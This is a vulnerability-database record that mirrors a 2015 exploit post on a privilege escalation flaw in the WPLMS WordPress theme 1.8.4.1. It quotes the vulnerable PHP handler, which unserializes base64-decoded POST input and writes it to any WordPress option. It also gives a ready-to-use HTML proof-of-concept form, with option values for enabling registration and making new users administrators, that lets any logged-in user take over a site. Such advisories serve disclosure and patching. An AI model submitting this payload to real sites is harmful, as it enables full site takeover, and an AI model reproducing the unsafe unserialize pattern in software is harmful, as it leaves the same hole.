DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-23263", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress WPLMS 1.8.4.1 Privilege Escalation Vulnerability", "description": "WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.", "published": "2015-02-09T00:00:00", "modified": "2015-02-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/23263", "reporter": "Evex", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-03T19:41:27", "viewCount": 15, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/23263", "sourceData": "------------------------------------------------------------------------------\r\nWordPress WPLMS Theme Previlege Escalation\r\n------------------------------------------------------------------------------\r\n\r\n[-] Author: Evex\r\n\r\nhttp://packetstormsecurity.com/user/evex/\r\ntwitter: https://twitter.com/Evexola\r\n\r\n[-] Theme Link:\r\n\r\nhttp://themeforest.net/item/wplms-learning-management-system/6780226\r\n\r\n\r\n[-] Affected Version:\r\n\r\nVersion 1.8.4.1\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the /includes/func.php\r\nscript:\r\n\r\n\r\nadd_action( 'wp_ajax_import_data', 'import_data' );\r\nfunction import_data(){\r\n $name = stripslashes($_POST['name']);\r\n $code = base64_decode(trim($_POST['code']));\r\n if(is_string($code))\r\n $code = unserialize ($code);\r\n $value = get_option($name);\r\n if(isset($value)){\r\n update_option($name,$code);\r\n }else{\r\n echo \"Error, Option does not exist !\";\r\n }\r\n die();\r\n}\r\n\r\n\r\nthen function import_data can be called by logged in users\r\nand executed which can lead to modifying wordpress settings and adding a\r\nnew administrator which may cause the site a full take over\r\n\r\n\r\n[-] Proof of Concept:\r\n\r\n\r\n(Must be submited with a logged in user)\r\nOPTION:\r\nadmin_email, default_role, users_can_register\r\n\r\nValue(must be serialized then encoded by base64):\r\nusers_can_register (0,1)\r\n\r\ndefault_role (administrator, author, editor...)\r\n\r\nadmin_email( [email\u00a0protected] )\r\n\r\n<form action=\"http://domain.tld/wp-admin/admin-ajax.php?action=import_data\"\r\nmethod=\"post\" >\r\n <input type=\"hidden\" name=\"name\" value=\"OPTION\" />\r\n <input type=\"hidden\" name=\"code\" value=\"VALUE\" />\r\n <button type=\"submit\" >Submit</button>\r\n</form>\n\n# 0day.today [2018-04-03] #", "_state": {"dependencies": 1645260075, "score": 1659766679, "epss": 1678812679}}

{}